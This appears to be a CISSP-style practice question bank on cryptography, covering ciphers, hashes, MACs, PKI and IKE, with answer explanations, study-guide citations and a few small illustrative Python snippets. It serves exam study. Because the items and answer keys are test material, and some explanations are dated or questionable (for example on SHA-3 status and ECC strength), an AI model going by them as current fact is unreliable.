Which of the following ciphers is the simple cipher on which the Vigenère polyalphabetic cipher was based?
Caesar
The Jefferson disks
Enigma
SIGABA
In cryptography, a Caesar cipher, also known as Caesar's cipher, the shift cipher, Caesar's code or Caesar shift, is one of the simplest and most widely known encryption techniques. It is a type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet. For example, with a left shift of 3, D would be replaced by A, E would become B, and so on. The method is named after Julius Caesar, who used it in his private correspondence.
The encryption step performed by a Caesar cipher is often incorporated as part of more complex schemes, such as the Vigenère cipher, and still has modern application in the ROT13 system. As with all single alphabet substitution ciphers, the Caesar cipher is easily broken and in modern practice offers essentially no communication security.
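As a quick illustration of the shift operation described above, here is a minimal Python sketch (the function name and messages are made up for the example; a right shift of 3 is shown, and the text's left shift of 3 is simply a shift of -3):

    def caesar_shift(text, shift):
        # Shift each letter by a fixed number of positions; leave other characters alone.
        result = []
        for ch in text.upper():
            if ch.isalpha():
                result.append(chr((ord(ch) - ord('A') + shift) % 26 + ord('A')))
            else:
                result.append(ch)
        return ''.join(result)

    ciphertext = caesar_shift("ATTACK AT DAWN", 3)    # 'DWWDFN DW GDZQ'
    plaintext = caesar_shift(ciphertext, -3)          # shifting back recovers the original

The Vigenère cipher simply applies a different Caesar shift to each letter position, with the shift amounts taken from a repeating keyword.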
The following answers were incorrect:
The Jefferson disk, or wheel cipher as Thomas Jefferson named it, also known as the Bazeries Cylinder, is a cipher system using a set of wheels or disks, each with the 26 letters of the alphabet arranged around their edge. The order of the letters is different for each disk and is usually scrambled in some random way. Each disk is marked with a unique number. A hole in the centre of the disks allows them to be stacked on an axle. The disks are removable and can be mounted on the axle in any order desired. The order of the disks is the cipher key, and both sender and receiver must arrange the disks in the same predefined order. Jefferson's device had 36 disks.
An Enigma machine is any of a family of related electro-mechanical rotor cipher machines used for the encryption and decryption of secret messages. Enigma was invented by the German engineer Arthur Scherbius at the end of World War I. The early models were used commercially from the early 1920s, and adopted by military and government services of several countries. Several different Enigma models were produced, but the German military models are the ones most commonly discussed.
SIGABA: In the history of cryptography, the ECM Mark II was a cipher machine used by the United States for message encryption from World War II until the 1950s. The machine was also known as the SIGABA or Converter M-134 by the Army, or CSP-888/889 by the Navy, and a modified Navy version was termed the CSP-2900. Like many machines of the era it used an electromechanical system of rotors in order to encipher messages, but with a number of security improvements over previous designs. No successful cryptanalysis of the machine during its service lifetime is publicly known.
Reference(s) used for this question:
http://en.wikipedia.org/wiki/Jefferson_disk
http://en.wikipedia.org/wiki/Sigaba
http://en.wikipedia.org/wiki/Enigma_machine
Virus scanning and content inspection of S/MIME encrypted e-mail without doing any further processing is:
Not possible
Only possible with key recovery scheme of all user keys
It is possible only if X509 Version 3 certificates are used
It is possible only by "brute force" decryption
Content security measures presume that the content is available in cleartext on the central mail server.
Encrypted e-mails have to be decrypted before they can be filtered (e.g. to detect viruses), so you need the decryption key on the central "crypto mail server".
There are several ways to manage such keys, e.g. by message or key recovery methods. However, that would certainly require further processing in order to achieve such a goal.
Which of the following is NOT true of pre-shared key authentication within the IKE/IPsec protocol?
Pre-shared key authentication is normally based on simple passwords
Needs a Public Key Infrastructure (PKI) to work
IKE is used to setup Security Associations
IKE builds upon the Oakley protocol and the ISAKMP protocol.
Internet Key Exchange (IKE or IKEv2) is the protocol used to set up a security association (SA) in the IPsec protocol suite. IKE builds upon the Oakley protocol and ISAKMP. IKE uses X.509 certificates for authentication which are either pre-shared or distributed using DNS (preferably with DNSSEC) and a Diffie–Hellman key exchange to set up a shared session secret from which cryptographic keys are derived.
Internet Key Exchange (IKE) allows communicating partners to prove their identity to each other and establish a secure communication channel, and is applied as an authentication component of IPsec.
IKE uses two phases:
Phase 1: In this phase, the partners authenticate with each other, using one of the following:
Shared Secret: A key that is exchanged by humans via telephone, fax, encrypted e-mail, etc.
Public Key Encryption: Digital certificates are exchanged.
Revised mode of Public Key Encryption: To reduce the overhead of public key encryption, a nonce (in security engineering, a number or bit string used only once) is encrypted with the communicating partner's public key, and the peer's identity is encrypted with symmetric encryption using the nonce as the key. Next, IKE establishes a temporary security association and secure tunnel to protect the rest of the key exchange.
Phase 2: The peers' security associations are established, using the secure tunnel and temporary SA created at the end of phase 1.
The following reference(s) were used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 7032-7048). Auerbach Publications. Kindle Edition.
and
RFC 2409 at http://tools.ietf.org/html/rfc2409
and
http://en.wikipedia.org/wiki/Internet_Key_Exchange
Which of the following is best provided by symmetric cryptography?
Confidentiality
Integrity
Availability
Non-repudiation
When using symmetric cryptography, both parties will be using the same key for encryption and decryption. Symmetric cryptography is generally fast and can be hard to break, but it offers limited overall security in that it can only provide confidentiality.
Source: WALLHOFF, John, CBK#5 Cryptography (CISSP Study Guide), April 2002 (page 2).
Which of the following is a symmetric encryption algorithm?
RSA
Elliptic Curve
RC5
El Gamal
RC5 is a symmetric encryption algorithm. It is a block cipher of variable block length that encrypts through integer addition, the application of a bitwise exclusive OR (XOR), and variable rotations.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 4: Cryptography (page 153).
Which of the following statements pertaining to stream ciphers is correct?
A stream cipher is a type of asymmetric encryption algorithm.
A stream cipher generates what is called a keystream.
A stream cipher is slower than a block cipher.
A stream cipher is not appropriate for hardware-based encryption.
A stream cipher is a type of symmetric encryption algorithm that operates on continuous streams of plain text and is appropriate for hardware-based encryption.
Stream ciphers can be designed to be exceptionally fast, much faster than any block cipher. A stream cipher generates what is called a keystream (a sequence of bits used as a key).
Stream ciphers can be viewed as approximating the action of a proven unbreakable cipher, the one-time pad (OTP), sometimes known as the Vernam cipher. A one-time pad uses a keystream of completely random digits. The keystream is combined with the plaintext digits one at a time to form the ciphertext. This system was proved to be secure by Claude Shannon in 1949. However, the keystream must be (at least) the same length as the plaintext, and generated completely at random. This makes the system very cumbersome to implement in practice, and as a result the one-time pad has not been widely used, except for the most critical applications.
A stream cipher makes use of a much smaller and more convenient key — 128 bits, for example. Based on this key, it generates a pseudorandom keystream which can be combined with the plaintext digits in a similar fashion to the one-time pad. However, this comes at a cost: because the keystream is now pseudorandom, and not truly random, the proof of security associated with the one-time pad no longer holds: it is quite possible for a stream cipher to be completely insecure if it is not implemented properly as we have seen with the Wired Equivalent Privacy (WEP) protocol.
Encryption is accomplished by combining the keystream with the plaintext, usually with the bitwise XOR operation.
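A minimal sketch of that combining step in Python is shown below; the keystream here is taken directly from the operating system's random generator purely to stand in for a cipher's keystream generator:

    import os

    def xor_bytes(data, keystream):
        # Bitwise XOR of the message with the keystream; applying it twice decrypts.
        return bytes(d ^ k for d, k in zip(data, keystream))

    plaintext = b"STREAM CIPHERS ARE FAST"
    keystream = os.urandom(len(plaintext))   # stand-in for the cipher's keystream generator

    ciphertext = xor_bytes(plaintext, keystream)
    recovered = xor_bytes(ciphertext, keystream)
    assert recovered == plaintext

If the keystream were truly random and never reused, this would be exactly the one-time pad described above; a practical stream cipher replaces it with a pseudorandom keystream derived from a short key.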
Source: DUPUIS, Clement, CISSP Open Study Guide on domain 5, cryptography, April 1999.
More details can be obtained on Stream Ciphers in RSA Security's FAQ on Stream Ciphers.
Which of the following offers confidentiality to an e-mail message?
The sender encrypting it with its private key.
The sender encrypting it with its public key.
The sender encrypting it with the receiver's public key.
The sender encrypting it with the receiver's private key.
An e-mail message's confidentiality is protected when it is encrypted with the receiver's public key, because the receiver is the only one able to decrypt the message. The sender is not supposed to have the receiver's private key. By encrypting a message with the sender's private key, anybody possessing the corresponding public key would be able to read the message. By encrypting the message with the sender's own public key, not even the receiver would be able to read the message.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 8: Cryptography (page 517).
The computations involved in selecting keys and in enciphering data are complex, and are not practical for manual use. However, using mathematical properties of modular arithmetic and a method known as "_________________," RSA is quite feasible for computer use.
computing in Galois fields
computing in Gladden fields
computing in Gallipoli fields
computing in Galbraith fields
The computations involved in selecting keys and in enciphering data are complex, and are not practical for manual use. However, using mathematical properties of modular arithmetic and a method known as computing in Galois fields, RSA is quite feasible for computer use.
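As a rough illustration of the modular-arithmetic side of this, here is a toy textbook-RSA computation in Python; the tiny primes are chosen for readability only and provide no security, and real implementations add padding and the field-arithmetic optimizations mentioned above:

    # Toy textbook RSA with tiny primes (illustration only).
    p, q = 61, 53
    n = p * q                    # public modulus: 3233
    phi = (p - 1) * (q - 1)      # 3120
    e = 17                       # public exponent, coprime with phi
    d = pow(e, -1, phi)          # private exponent: 2753 (modular inverse, Python 3.8+)

    message = 65
    ciphertext = pow(message, e, n)     # encrypt with the public key (e, n)
    recovered = pow(ciphertext, d, n)   # decrypt with the private key (d, n)
    assert recovered == message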
Source: FITES, Philip E., KRATZ, Martin P., Information Systems Security: A Practitioner's Reference, 1993, Van Nostrand Reinhold, page 44.
Which of the following services is not provided by a public key infrastructure (PKI)?
Access control
Integrity
Authentication
Reliability
A Public Key Infrastructure (PKI) provides confidentiality, access control, integrity, authentication and non-repudiation.
It does not provide reliability services.
Reference(s) used for this question:
TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following is more suitable for a hardware implementation?
Stream ciphers
Block ciphers
Cipher block chaining
Electronic code book
A stream cipher treats the message as a stream of bits or bytes and performs mathematical functions on them individually. The key is a random value input into the stream cipher, which it uses to ensure the randomness of the keystream data. Stream ciphers are more suitable for hardware implementations because they encrypt and decrypt one bit at a time; this bit-by-bit manipulation is computationally intensive in software but works well at the silicon level. Block ciphers operate at the block level, dividing the message into blocks of bits. Cipher Block Chaining (CBC) and Electronic Code Book (ECB) are operation modes of DES, a block encryption algorithm.
Source: WALLHOFF, John, CBK#5 Cryptography (CISSP Study Guide), April 2002 (page 2).
Which of the following is not a one-way hashing algorithm?
MD2
RC4
SHA-1
HAVAL
RC4 was designed by Ron Rivest of RSA Security in 1987. While it is officially termed "Rivest Cipher 4", the RC acronym is alternatively understood to stand for "Ron's Code" (see also RC2, RC5 and RC6).
RC4 was initially a trade secret, but in September 1994 a description of it was anonymously posted to the Cypherpunks mailing list. It was soon posted on the sci.crypt newsgroup, and from there to many sites on the Internet. The leaked code was confirmed to be genuine as its output was found to match that of proprietary software using licensed RC4. Because the algorithm is known, it is no longer a trade secret. The name RC4 is trademarked, so RC4 is often referred to as ARCFOUR or ARC4 (meaning alleged RC4) to avoid trademark problems. RSA Security has never officially released the algorithm; Rivest has, however, linked to the English Wikipedia article on RC4 in his own course notes. RC4 has become part of some commonly used encryption protocols and standards, including WEP and WPA for wireless cards and TLS.
The main factors in RC4's success over such a wide range of applications are its speed and simplicity: efficient implementations in both software and hardware are very easy to develop.
The following answers were not correct choices:
SHA-1 is a one-way hashing algorithm. SHA-1 is a cryptographic hash function designed by the United States National Security Agency and published by the United States NIST as a U.S. Federal Information Processing Standard. SHA stands for "secure hash algorithm".
The three SHA algorithms are structured differently and are distinguished as SHA-0, SHA-1, and SHA-2. SHA-1 is very similar to SHA-0, but corrects an error in the original SHA hash specification that led to significant weaknesses. The SHA-0 algorithm was not adopted by many applications. SHA-2 on the other hand significantly differs from the SHA-1 hash function.
SHA-1 is the most widely used of the existing SHA hash functions, and is employed in several widely used security applications and protocols. In 2005, security flaws were identified in SHA-1, namely that a mathematical weakness might exist, indicating that a stronger hash function would be desirable. Although no successful attacks have yet been reported on the SHA-2 variants, they are algorithmically similar to SHA-1 and so efforts are underway to develop improved alternatives. A new hash standard, SHA-3, is currently under development — an ongoing NIST hash function competition is scheduled to end with the selection of a winning function in 2012.
SHA-1 produces a 160-bit message digest based on principles similar to those used by Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms, but has a more conservative design.
MD2 is a one-way hashing algorithm. The MD2 Message-Digest Algorithm is a cryptographic hash function developed by Ronald Rivest in 1989. The algorithm is optimized for 8-bit computers. MD2 is specified in RFC 1319. Although MD2 is no longer considered secure, even as of 2010 it remains in use in public key infrastructures as part of certificates generated with MD2 and RSA.
HAVAL is a one-way hashing algorithm. HAVAL is a cryptographic hash function. Unlike MD5, but like most modern cryptographic hash functions, HAVAL can produce hashes of different lengths: 128 bits, 160 bits, 192 bits, 224 bits, and 256 bits. HAVAL also allows users to specify the number of rounds (3, 4, or 5) to be used to generate the hash.
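For the algorithms that are hashes, Python's standard hashlib module (which exposes SHA-1 and MD5, though not MD2 or HAVAL) shows what a one-way digest looks like in practice:

    import hashlib

    message = b"The quick brown fox jumps over the lazy dog"

    print(hashlib.sha1(message).hexdigest())  # 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12 (160 bits)
    print(hashlib.md5(message).hexdigest())   # 9e107d9d372bb6826bd81d3542a419d6 (128 bits)
    # There is no "decrypt" for a hash: recovering the message from the digest is infeasible.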
The following reference(s) were used for this question:
SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
and
https://en.wikipedia.org/wiki/HAVAL
and
https://en.wikipedia.org/wiki/MD2_%28cryptography%29
and
https://en.wikipedia.org/wiki/SHA-1
Which of the following is NOT a known type of Message Authentication Code (MAC)?
Keyed-hash message authentication code (HMAC)
DES-CBC
Signature-based MAC (SMAC)
Universal Hashing Based MAC (UMAC)
There is no such thing as a Signature-Based MAC. Being the wrong choice in the list, it is the best answer to this question.
WHAT IS A Message Authentication Code (MAC)?
In Cryptography, a MAC (Message Authentication Code) also known as a cryptographic checksum, is a small block of data that is generated using a secret key and then appended to the message. When the message is received, the recipient can generate their own MAC using the secret key, and thereby know that the message has not changed either accidentally or intentionally in transit. Of course, this assurance is only as strong as the trust that the two parties have that no one else has access to the secret key.
A MAC is a small representation of a message and has the following characteristics:
A MAC is much smaller than the message generating it.
Given a MAC, it is impractical to compute the message that generated it.
Given a MAC and the message that generated it, it is impractical to find another message generating the same MAC.
See the graphic below from Wikipedia showing the creation of a MAC value:
[Figure from Wikipedia: generation and verification of a Message Authentication Code (MAC/HMAC)]
In the example above, the sender of a message runs it through a MAC algorithm to produce a MAC data tag. The message and the MAC tag are then sent to the receiver. The receiver in turn runs the message portion of the transmission through the same MAC algorithm using the same key, producing a second MAC data tag. The receiver then compares the first MAC tag received in the transmission to the second generated MAC tag. If they are identical, the receiver can safely assume that the integrity of the message was not compromised, and the message was not altered or tampered with during transmission.
However, to allow the receiver to be able to detect replay attacks, the message itself must contain data that assures that this same message can only be sent once (e.g. time stamp, sequence number or use of a one-time MAC). Otherwise an attacker could — without even understanding its content — record this message and play it back at a later time, producing the same result as the original sender.
NOTE: There are many ways of producing a MAC value. Below you have a short list of some implementations.
The following were incorrect answers for this question:
They were all incorrect answers because they are all real types of MAC implementations.
In the case of DES-CBC, a MAC is generated using the DES algorithm in CBC mode, and the secret DES key is shared by the sender and the receiver. The MAC is actually just the last block of ciphertext generated by the algorithm. This block of data (64 bits) is attached to the unencrypted message and transmitted to the far end. All previous blocks of encrypted data are discarded to prevent any attack on the MAC itself. The receiver can just generate his own MAC using the secret DES key he shares to ensure message integrity and authentication. He knows that the message has not changed because the chaining function of CBC would significantly alter the last block of data if any bit had changed anywhere in the message. He knows the source of the message (authentication) because only one other person holds the secret key.
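A sketch of that CBC-MAC construction is shown below, using AES from the third-party pyca/cryptography package in place of DES (which modern libraries rarely expose); the zero IV, message, and padding choices are simplifications for the example, and a production system would use HMAC or CMAC instead:

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def cbc_mac(key, message):
        # Encrypt the message in CBC mode and keep only the last ciphertext block as the MAC.
        padded = message + b"\x00" * (-len(message) % 16)
        encryptor = Cipher(algorithms.AES(key), modes.CBC(b"\x00" * 16)).encryptor()
        ciphertext = encryptor.update(padded) + encryptor.finalize()
        return ciphertext[-16:]   # earlier blocks are discarded

    key = os.urandom(16)          # shared secret between sender and receiver
    tag = cbc_mac(key, b"transfer 100 to account 42")
    # The receiver recomputes the tag with the same key and compares it to the one received.
    assert cbc_mac(key, b"transfer 100 to account 42") == tag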
A Keyed-hash message authentication code (HMAC) is a specific construction for calculating a message authentication code (MAC) involving a cryptographic hash function in combination with a secret cryptographic key. As with any MAC, it may be used to simultaneously verify both the data integrity and the authentication of a message. Any cryptographic hash function, such as MD5, SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly. The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output, and on the size and quality of the key.
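Python's standard hmac and hashlib modules implement this construction directly; a brief example (the key and message here are made up):

    import hmac
    import hashlib

    key = b"shared-secret-key"                 # illustrative only; real keys should be random
    message = b"wire $100 to account 12345"

    tag = hmac.new(key, message, hashlib.sha1).hexdigest()   # HMAC-SHA1 tag sent with the message

    # The receiver recomputes the tag with the same key and compares in constant time.
    expected = hmac.new(key, message, hashlib.sha1).hexdigest()
    assert hmac.compare_digest(tag, expected)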
A message authentication code based on universal hashing, or UMAC, is a type of message authentication code (MAC) calculated choosing a hash function from a class of hash functions according to some secret (random) process and applying it to the message. The resulting digest or fingerprint is then encrypted to hide the identity of the hash function used. As with any MAC, it may be used to simultaneously verify both the data integrity and the authenticity of a message. UMAC is specified in RFC 4418, it has provable cryptographic strength and is usually a lot less computationally intensive than other MACs.
What is the MicMac (confusion) with MIC and MAC?
The term message integrity code (MIC) is frequently substituted for the term MAC, especially in communications, where the acronym MAC traditionally stands for Media Access Control when referring to Networking. However, some authors use MIC as a distinctly different term from a MAC; in their usage of the term the MIC operation does not use secret keys. This lack of security means that any MIC intended for use gauging message integrity should be encrypted or otherwise be protected against tampering. MIC algorithms are created such that a given message will always produce the same MIC assuming the same algorithm is used to generate both. Conversely, MAC algorithms are designed to produce matching MACs only if the same message, secret key and initialization vector are input to the same algorithm. MICs do not use secret keys and, when taken on their own, are therefore a much less reliable gauge of message integrity than MACs. Because MACs use secret keys, they do not necessarily need to be encrypted to provide the same level of assurance.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 15799-15815). Auerbach Publications. Kindle Edition.
and
http://en.wikipedia.org/wiki/Message_authentication_code
and
http://tools.ietf.org/html/rfc4418
Which of the following issues is not addressed by digital signatures?
nonrepudiation
authentication
data integrity
denial-of-service
A digital signature directly addresses integrity, authentication, and nonrepudiation. It does not address availability, which is what denial-of-service attacks target.
The other answers are not correct because:
"nonrepudiation" is not correct because a digital signature can provide for nonrepudiation.
"authentication" is not correct because a digital signature can be used as an authentication mechanism
"data integrity" is not correct because a digital signature does verify data integrity (as part of nonrepudiation)
References:
Official ISC2 Guide page: 227 & 265
All in One Third Edition page: 648
Which of the following is not an example of a block cipher?
Skipjack
IDEA
Blowfish
RC4
RC4 is a proprietary, variable-key-length stream cipher invented by Ron Rivest for RSA Data Security, Inc. Skipjack, IDEA and Blowfish are examples of block ciphers.
Source: SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
Which of the following encryption methods is known to be unbreakable?
Symmetric ciphers.
DES codebooks.
One-time pads.
Elliptic Curve Cryptography.
A one-time pad uses a keystream of bits that is generated completely at random and used only once. Because it is used only once, it is considered unbreakable.
The following answers are incorrect:
Symmetric ciphers. This is incorrect because a symmetric cipher is created by substitution and transposition. They can and have been broken.
DES codebooks. This is incorrect because the Data Encryption Standard (DES) has been broken; it was replaced by the Advanced Encryption Standard (AES).
Elliptic Curve Cryptography. This is incorrect because Elliptic Curve Cryptography (ECC) is typically used on wireless devices such as cellular phones that have small processors. Because of the lack of processing power, the keys used are often small. The smaller the key, the easier it is considered to be to break. Also, the technology has not been around long enough, or been tested thoroughly enough, to be considered truly unbreakable.
Which protocol makes use of an electronic wallet on a customer's PC and sends encrypted credit card information to the merchant's Web server, which digitally signs it and sends it on to its processing bank?
SSH ( Secure Shell)
S/MIME (Secure MIME)
SET (Secure Electronic Transaction)
SSL (Secure Sockets Layer)
The SET protocol was introduced by Visa and MasterCard to allow for more secure credit card transaction possibilities. It is comprised of three different pieces of software, running on the customer's PC (an electronic wallet), on the merchant's Web server and on the payment server of the merchant's bank. The credit card information is sent by the customer to the merchant's Web server, but the merchant does not open it; instead it digitally signs the information and sends it to its bank's payment server for processing.
The following answers are incorrect because :
SSH (Secure Shell) is incorrect as it functions as a type of tunneling mechanism that provides terminal like access to remote computers.
S/MIME is incorrect as it is a standard for encrypting and digitally signing electronic mail and for providing secure data transmissions.
SSL is incorrect as it uses public key encryption and provides data encryption, server authentication, message integrity, and optional client authentication.
Reference: Shon Harris, AIO v3, Chapter 8: Cryptography, Pages 667-669.
Which of the following are suitable protocols for securing VPN connections at the lower layers of the OSI model?
S/MIME and SSH
TLS and SSL
IPsec and L2TP
PKCS#10 and X.509
What key size is used by the Clipper Chip?
40 bits
56 bits
64 bits
80 bits
The Clipper Chip is an NSA-designed tamperproof chip for encrypting data, and it uses the SkipJack algorithm. Each Clipper Chip has a unique serial number, and a copy of the unit key is stored in a database under this serial number. The sending Clipper Chip generates and sends a Law Enforcement Access Field (LEAF) value included in the transmitted message. It is based on an 80-bit key and a 16-bit checksum.
Source: WALLHOFF, John, CBK#5 Cryptography (CISSP Study Guide), April 2002 (page 1).
Which of the following algorithms is used today for encryption in PGP?
RSA
IDEA
Blowfish
RC5
The Pretty Good Privacy (PGP) email encryption system was developed by Phil Zimmermann. For encrypting messages, it actually uses AES with up to 256-bit keys, CAST, TripleDES, IDEA and Twofish. RSA is also used in PGP, but only for symmetric key exchange and for digital signatures, not for message encryption.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 4: Cryptography (pages 154, 169).
More info on PGP can be found on their site at http://www.pgp.com/display.php?pageID=29.
Which of the following answers is described as a random value used in cryptographic algorithms to ensure that patterns are not created during the encryption process?
IV - Initialization Vector
Stream Cipher
OTP - One Time Pad
Ciphertext
The basic power in cryptography is randomness. This uncertainty is why encrypted data is unusable to someone without the key to decrypt it.
Initialization Vectors are used with encryption keys to add an extra layer of randomness to encrypted data. If no IV is used, the attacker can possibly break the key space because of patterns resulting from the encryption process. Implementations such as DES in Electronic Code Book (ECB) mode would allow a frequency analysis attack to take place.
In cryptography, an initialization vector (IV) or starting variable (SV) is a fixed-size input to a cryptographic primitive that is typically required to be random or pseudorandom. Randomization is crucial for encryption schemes to achieve semantic security, a property whereby repeated usage of the scheme under the same key does not allow an attacker to infer relationships between segments of the encrypted message. For block ciphers, the use of an IV is described by so-called modes of operation. Randomization is also required for other primitives, such as universal hash functions and message authentication codes based thereon.
It is defined by TechTarget as:
An initialization vector (IV) is an arbitrary number that can be used along with a secret key for data encryption. This number, also called a nonce, is employed only one time in any session.
The use of an IV prevents repetition in data encryption, making it more difficult for a hacker using a dictionary attack to find patterns and break a cipher. For example, a sequence might appear twice or more within the body of a message. If there are repeated sequences in encrypted data, an attacker could assume that the corresponding sequences in the message were also identical. The IV prevents the appearance of corresponding duplicate character sequences in the ciphertext.
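The effect is easy to see in a short sketch (this one assumes the third-party pyca/cryptography package): the same plaintext block encrypted twice under the same key is identical in ECB mode, but differs when a fresh random IV is used with CBC mode.

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key = os.urandom(16)
    block = b"ATTACK AT DAWN!!"   # exactly one 16-byte AES block

    # Without an IV (ECB mode), identical plaintext blocks give identical ciphertext blocks.
    ecb = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    assert ecb.update(block) == ecb.update(block)

    # With a fresh random IV for each message (CBC mode), the ciphertexts differ.
    def encrypt_cbc(key, iv, data):
        enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
        return enc.update(data) + enc.finalize()

    assert encrypt_cbc(key, os.urandom(16), block) != encrypt_cbc(key, os.urandom(16), block)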
The following answers are incorrect:
- Stream Cipher: This isn't correct. A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom keystream to produce ciphertext.
- OTP - One Time Pad: This isn't correct, but an OTP is made up of random values used as key material (the encryption key). It is considered by most to be unbreakable, but a new key must be used after each message, which makes it impractical for common use.
- Ciphertext: Sorry, incorrect answer. Ciphertext is basically text that has been encrypted with key material (an encryption key).
The following reference(s) were used to create this question:
whatis.techtarget.com/definition/initialization-vector-IV
and
en.wikipedia.org/wiki/Initialization_vector
Which of the following is NOT an asymmetric key algorithm?
RSA
Elliptic Curve Cryptosystem (ECC)
El Gamal
Data Encryption System (DES)
Data Encryption Standard (DES) is a symmetric key algorithm. Originally developed by IBM under the project name Lucifer, this 128-bit algorithm was accepted by the NBS (later NIST) in 1974, but the key size was reduced to 56 bits, plus 8 bits for parity. It somehow became a national cryptographic standard in 1977, and an American National Standards Institute (ANSI) standard in 1978. DES was later replaced by the Advanced Encryption Standard (AES) by NIST. All other options are asymmetric algorithms.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 8: Cryptography (page 525).
What is the name of a one-way transformation of a string of characters into a usually shorter fixed-length value or key that represents the original string, and that cannot be reversed?
One-way hash
DES
Transposition
Substitution
A cryptographic hash function is a transformation that takes an input (or 'message') and returns a fixed-size string, which is called the hash value (sometimes termed a message digest, a digital fingerprint, a digest or a checksum).
The ideal hash function has three main properties - it is extremely easy to calculate a hash for any given data, it is extremely difficult or almost impossible in a practical sense to calculate a text that has a given hash, and it is extremely unlikely that two different messages, however close, will have the same hash.
Functions with these properties are used as hash functions for a variety of purposes, both within and outside cryptography. Practical applications include message integrity checks, digital signatures, authentication, and various information security applications. A hash can also act as a concise representation of the message or document from which it was computed, and allows easy indexing of duplicate or unique data files.
In various standards and applications, the two most commonly used hash functions are MD5 and SHA-1. In 2005, security flaws were identified in both of these, namely that a possible mathematical weakness might exist, indicating that a stronger hash function would be desirable. In 2007 the National Institute of Standards and Technology announced a contest to design a hash function which will be given the name SHA-3 and be the subject of a FIPS standard.
A hash function takes a string of any length as input and produces a fixed length string which acts as a kind of "signature" for the data provided. In this way, a person knowing the hash is unable to work out the original message, but someone knowing the original message can prove the hash is created from that message, and none other. A cryptographic hash function should behave as much as possible like a random function while still being deterministic and efficiently computable.
A cryptographic hash function is considered "insecure" from a cryptographic point of view, if either of the following is computationally feasible:
finding a (previously unseen) message that matches a given digest
finding "collisions", wherein two different messages have the same message digest.
An attacker who can do either of these things might, for example, use them to substitute an authorized message with an unauthorized one.
Ideally, it should not even be feasible to find two messages whose digests are substantially similar; nor would one want an attacker to be able to learn anything useful about a message given only its digest. Of course the attacker learns at least one piece of information, the digest itself, which for instance gives the attacker the ability to recognise the same message should it occur again.
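Two of those properties, the fixed-length output and the drastic change in the digest caused by a tiny change in the input, can be seen with Python's standard hashlib:

    import hashlib

    d1 = hashlib.sha1(b"Pay Alice $100").hexdigest()
    d2 = hashlib.sha1(b"Pay Alice $900").hexdigest()   # one character changed

    assert len(d1) == len(d2) == 40   # SHA-1 always produces a 160-bit (40 hex character) digest
    assert d1 != d2                   # a one-character change gives a different (in practice unrelated) digest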
REFERENCES:
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Pages 40-41.
also see:
http://en.wikipedia.org/wiki/Cryptographic_hash_function
Which type of attack is based on the probability of two different messages using the same hash function producing a common message digest?
Differential cryptanalysis
Differential linear cryptanalysis
Birthday attack
Statistical attack
A Birthday attack is usually applied to the probability of two different messages using the same hash function producing a common message digest.
The term "birthday" comes from the fact that in a room with 23 people, the probability of two of more people having the same birthday is greater than 50%.
Linear cryptanalysis is a general form of cryptanalysis based on finding affine approximations to the action of a cipher. Attacks have been developed for block ciphers and stream ciphers. Linear cryptanalysis is one of the two most widely used attacks on block ciphers; the other being differential cryptanalysis.
Differential Cryptanalysis is a potent cryptanalytic technique introduced by Biham and Shamir. Differential cryptanalysis is designed for the study and attack of DES-like cryptosystems. A DES-like cryptosystem is an iterated cryptosystem which relies on conventional cryptographic techniques such as substitution and diffusion.
Differential cryptanalysis is a general form of cryptanalysis applicable primarily to block ciphers, but also to stream ciphers and cryptographic hash functions. In the broadest sense, it is the study of how differences in an input can affect the resultant difference at the output. In the case of a block cipher, it refers to a set of techniques for tracing differences through the network of transformations, discovering where the cipher exhibits non-random behaviour, and exploiting such properties to recover the secret key.
Source:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 4: Cryptography (page 163).
and
http://en.wikipedia.org/wiki/Differential_cryptanalysis
Which of the following Intrusion Detection Systems (IDS) uses a database of attacks and known system vulnerabilities, monitors current attempts to exploit those vulnerabilities, and then triggers an alarm if an attempt is found?
Knowledge-Based ID System
Application-Based ID System
Host-Based ID System
Network-Based ID System
Knowledge-based Intrusion Detection Systems use a database of previous attacks and known system vulnerabilities to look for current attempts to exploit those vulnerabilities, and trigger an alarm if an attempt is found.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 87.
Application-Based ID System - "a subset of HIDS that analyze what's going on in an application using the transaction log files of the application." Source: Official ISC2 CISSP CBK Review Seminar Student Manual Version 7.0 p. 87
Host-Based ID System - "an implementation of IDS capabilities at the host level. Its most significant difference from NIDS is intrusion detection analysis, and related processes are limited to the boundaries of the host." Source: Official ISC2 Guide to the CISSP CBK - p. 197
Network-Based ID System - "a network device, or dedicated system attached to teh network, that monitors traffic traversing teh network segment for which it is integrated." Source: Official ISC2 Guide to the CISSP CBK - p. 196
What ensures that the control mechanisms correctly implement the security policy for the entire life cycle of an information system?
Accountability controls
